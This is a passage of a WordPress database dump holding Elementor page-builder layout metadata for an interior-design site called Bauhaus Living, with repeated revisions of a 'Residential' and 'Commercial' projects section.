projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2663,4701,'_elementor_page_assets','a:0:{}'),(2664,4702,'_wp_page_template','elementor_header_footer'),(2665,4702,'_elementor_edit_mode','builder'),(2666,4702,'_elementor_template_type','wp-page'),(2667,4702,'_elementor_version','3.8.1'),(2668,4702,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2669,4702,'_elementor_page_assets','a:0:{}'),(2670,4685,'_elementor_pro_version','3.8.1'),(2672,4703,'_wp_page_template','elementor_header_footer'),(2673,4703,'_elementor_edit_mode','builder'),(2674,4703,'_elementor_template_type','wp-page'),(2675,4703,'_elementor_version','3.8.1'),(2676,4703,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2677,4703,'_elementor_page_assets','a:0:{}'),(2678,4703,'_elementor_pro_version','3.8.1'),(2679,4703,'_elementor_css','a:6:{s:4:\"time\";i:1668399501;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2680,4704,'_wp_page_template','elementor_header_footer'),(2681,4704,'_elementor_edit_mode','builder'),(2682,4704,'_elementor_template_type','wp-page'),(2683,4704,'_elementor_version','3.8.1'),(2684,4704,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2685,4704,'_elementor_page_assets','a:0:{}'),(2686,4704,'_elementor_pro_version','3.8.1'),(2687,4704,'_elementor_css','a:6:{s:4:\"time\";i:1668399501;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2688,4705,'_wp_page_template','elementor_header_footer'),(2689,4705,'_elementor_edit_mode','builder'),(2690,4705,'_elementor_template_type','wp-page'),(2691,4705,'_elementor_version','3.8.1'),(2692,4705,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2693,4705,'_elementor_page_assets','a:0:{}'),(2694,4705,'_elementor_pro_version','3.8.1'),(2695,4705,'_elementor_css','a:6:{s:4:\"time\";i:1668399501;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2696,4706,'_elementor_edit_mode','builder'),(2697,4706,'_elementor_template_type','kit'),(2698,4706,'_elementor_css','a:6:{s:4:\"time\";i:1668396689;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2699,10,'_wp_page_template','default'),(2700,10,'_elementor_page_settings','a:2:{s:9:\"site_name\";s:14:\"Bauhaus Living\";s:16:\"site_description\";s:46:\"Bauhaus Living: Your Premium Interior Designer\";}'),(2701,22,'_edit_lock','1695733921:3'),(2702,677,'_elementor_css','a:6:{s:4:\"time\";i:1668400051;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2704,4685,'_elementor_css','a:6:{s:4:\"time\";i:1668400152;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2705,4707,'_wp_page_template','elementor_header_footer'),(2706,4707,'ova_met_header_version','ova,header-banner'),(2707,4707,'ova_met_footer_version','ova,footer'),(2708,4707,'ova_met_main_layout','global'),(2709,4707,'ova_met_wide_site','global'),(2710,4707,'_elementor_edit_mode','builder'),(2711,4707,'_elementor_template_type','wp-page'),(2712,4707,'_elementor_version','3.8.1'),(2713,4707,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding Services\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Home Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2714,4707,'_elementor_page_assets','a:0:{}'),(2715,4707,'_wxr_import_has_attachment_refs','1'),(2716,4707,'_edit_lock','1685012647:2'),(2717,4707,'_edit_last','1'),(2718,4707,'rs_page_bg_color',''),(2719,4707,'_elementor_pro_version','3.8.1'),(2736,4708,'_wp_page_template','elementor_header_footer'),(2737,4708,'_elementor_edit_mode','builder'),(2738,4708,'_elementor_template_type','wp-page'),(2739,4708,'_elementor_version','3.8.1'),(2740,4708,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\"